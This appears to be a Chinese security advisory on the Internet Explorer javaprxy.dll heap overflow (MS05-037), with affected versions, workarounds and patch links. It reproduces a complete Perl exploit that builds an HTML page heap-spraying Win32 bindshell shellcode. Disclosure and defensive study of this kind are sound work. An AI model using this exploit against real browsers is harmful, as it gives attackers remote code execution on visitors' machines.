安全研究
安全漏洞
Microsoft IE javaprxy.dll COM对象实例化堆溢出漏洞(MS05-037)
发布日期:2005-06-30
更新日期:2005-07-12
受影响系统:
Microsoft Internet Explorer 5.0.1 SP3描述:
- Microsoft Windows 2000 SP3
Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 SP4
Microsoft Internet Explorer 5.5 SP2
- Microsoft Windows Millennium Edition
Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2
- Microsoft Windows XP 64-bit Edition
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
Microsoft Internet Explorer 6.0 SP1
- Microsoft Windows XP SP1
- Microsoft Windows Millennium Edition
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000 SP4
- Microsoft Windows 2000 SP3
BUGTRAQ ID: 14087
CVE(CAN) ID: CVE-2005-2087
Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
Microsoft Internet Explorer中存在堆溢出漏洞,远程攻击者可能利用这个漏洞覆盖函数指针或数据段,导致在IE环境中执行任意代码。
漏洞起因是恶意的网页实例化javaprxy.dll COM对象的方式。如果用户加载了有某些嵌入CLSID的HTML文档的话,就可能导致空指针错误或内存破坏。
<*来源:Bernhard Mueller (research@sec-consult.com)
sk0L (bmu@sec-consult.com)
Martin Eiszner (security@freefly.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112006764714946&w=2
http://www.sec-consult.com/184.html
http://www.frsirt.com/english/advisories/2005/0935
http://www.microsoft.com/technet/security/advisory/903144.mspx
http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
######################################################
#
# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >
# Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
######################################################
# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";
# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";
# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';
# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"</body><script>location.reload();</script></html>";
# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 禁止在IE中运行Javaprxy.dll COM对象;
* 将Internet和本地intranet安全区设置为“高”,以便在这些区中运行ActiveX控件前要求提示;
* 更改Internet Explorer在运行ActiveX控件前要求提示,或在Internet和本地intranet安全区中禁用ActiveX控件;
* 注销Javaprxy.dll COM对象;
* 将Javaprxy.dll的访问控制列表修改得更加受限制;
* 使用软件限制策略在IE中限制对Javaprxy.dll的访问;
* 使用Java删除工具从系统中删除Microsoft Java虚拟机。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-037)以及相应补丁:
MS05-037:Vulnerability in JView Profiler Could Allow Remote Code Execution (903235)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx#EEBABUAA
补丁下载:
Microsoft Windows 2000 Service Pack 4上的Internet Explorer 5.01 Service Pack 4:
http://www.microsoft.com/downloads/details.aspx?FamilyId=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 4或Microsoft Windows XP Service Pack 1上的Internet Explorer 6 Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?FamilyId=2A506C16-01EF-4060-BCF8-6993C55840A9
Microsoft Windows XP Service Pack 2的Internet Explorer 6:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C1381768-6C6D-4568-97B1-600DB8798EBF
Microsoft Windows Server 2003和Microsoft Windows Server 2003 Service Pack 1的Internet Explorer 6:
http://www.microsoft.com/downloads/details.aspx?FamilyId=F368E231-9918-4881-9F17-60312F82183F
Microsoft Windows Server 2003 for Itanium-based Systems和Microsoft Windows Server 2003 with SP1 for Itanium-based Systems :
http://www.microsoft.com/downloads/details.aspx?FamilyId=D785F9AB-DBE9-4272-A87E-64205690F98E
Microsoft Windows Server 2003 x64 Edition的Internet Explorer 6 :
http://www.microsoft.com/downloads/details.aspx?FamilyId=68209225-A682-4008-A22B-881C401486F7
Microsoft Windows XP Professional x64 Edition的Internet Explorer 6:
http://www.microsoft.com/downloads/details.aspx?FamilyId=80EFD9A8-7EE9-4B0B-8517-559C49614AB7
浏览次数:6554
严重程度:40(网友投票)
绿盟科技给您安全的保障